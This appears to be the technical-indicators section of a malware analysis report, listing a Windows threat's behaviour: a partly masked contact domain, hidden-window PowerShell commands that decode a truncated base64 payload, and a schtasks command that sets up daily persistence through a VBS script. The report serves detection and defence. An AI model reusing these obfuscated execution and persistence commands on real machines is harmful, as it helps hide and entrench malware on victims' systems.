Technical Information
- <SYSTEM32>\tasks\windowsapplicationservice
- 'ex#.###texadvising.com':80
- DNS ASK ex#.###texadvising.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JGJ3dnlmeHggPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICRid3...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JGJ3dnlmeHggPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICRid3...
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 12 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
- '<SYSTEM32>\taskeng.exe' {F2572D90-1FC5-4F36-9C04-EE310FDF877B} S-1-5-21-1960123792-2022915161-3775307078-1001:ogjtjwquwe\user:Interactive:[1]